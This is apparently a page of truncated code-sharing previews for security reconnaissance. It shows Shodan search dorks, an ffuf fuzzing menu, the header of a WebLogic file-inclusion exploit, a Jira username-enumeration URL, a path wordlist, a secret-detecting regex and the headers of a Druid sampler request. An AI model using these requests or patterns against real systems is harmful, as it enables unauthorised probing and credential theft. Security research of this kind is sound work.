POST /druid/indexer/v1/sampler?for=example-manifest HTTP/1.1
Host: REDACTED
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/json
Content-Length: 1006
Connection: close
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
hostname:target.com | to find all asset available for target.com on shodan | |
http.title:"title" | to find server/host with similer title | |
http.html:"/file" | to find server/host with similar path | |
html:"context" | to find server/host with similar string | |
server: "apache 2.2.3" | to find server/host with same server | |
port:80 | to find server/host with same port | |
os:"windows" | to find server/host with same os | |
asn:AS3214 | to find host/server with matched asn | |
http.status:200 | to find server/host with 200 http response code | |
http.favicon.hash:"hash" | to find server/host with same favico hash |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
echo "###############################" | |
echo "# Ffuf #" | |
echo "###############################" | |
echo "" | |
echo "" | |
echo "[1] subdomains.txt" | |
echo "[2] subdomain-large.txt" | |
echo "[3] raft-large-directories.txt" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Exploit Title: Oracle WebLogic Server 12.1.3.0.0 / 12.2.1.3.0 / 12.2.1.4.0 / 14.1.1.0.0 Local File Inclusion | |
# Date: 25/1/2022 | |
# Exploit Author: Jonah Tan (@picar0jsu) | |
# Vendor Homepage: https://www.oracle.com | |
# Software Link: https://www.oracle.com/middleware/technologies/weblogic-server-installers-downloads.html | |
# Version: 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0 | |
# Tested on: Windows Server 2019 | |
# CVE : CVE-2022-21371 | |
# Description |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
cve-2019-8449 | |
The /rest/api/latest/groupuserpicker resource in Jira before version 8.4.0 allows remote attackers to enumerate usernames via an information disclosure vulnerability. | |
https://jira.atlassian.com/browse/JRASERVER-69796 | |
https://victomhost/rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true | |
===================================================================================================================================== |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
index.html | |
robots.txt | |
favicon.ico | |
Makefile | |
.gitignore | |
404.html | |
index.js | |
README.md | |
500.html | |
422.html |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
(?i)((access_key|access_token|admin_pass|admin_user|algolia_admin_key|algolia_api_key|alias_pass|alicloud_access_key|amazon_secret_access_key|amazonaws|ansible_vault_password|aos_key|api_key|api_key_secret|api_key_sid|api_secret|api.googlemaps AIza|apidocs|apikey|apiSecret|app_debug|app_id|app_key|app_log_level|app_secret|appkey|appkeysecret|application_key|appsecret|appspot|auth_token|authorizationToken|authsecret|aws_access|aws_access_key_id|aws_bucket|aws_key|aws_secret|aws_secret_key|aws_token|AWSSecretKey|b2_app_key|bashrc password|bintray_apikey|bintray_gpg_password|bintray_key|bintraykey|bluemix_api_key|bluemix_pass|browserstack_access_key|bucket_password|bucketeer_aws_access_key_id|bucketeer_aws_secret_access_key|built_branch_deploy_key|bx_password|cache_driver|cache_s3_secret_key|cattle_access_key|cattle_secret_key|certificate_password|ci_deploy_password|client_secret|client_zpk_secret_key|clojars_password|cloud_api_key|cloud_watch_aws_access_key|cloudant_password|cloudflare_api_key|cloudflare_auth_k |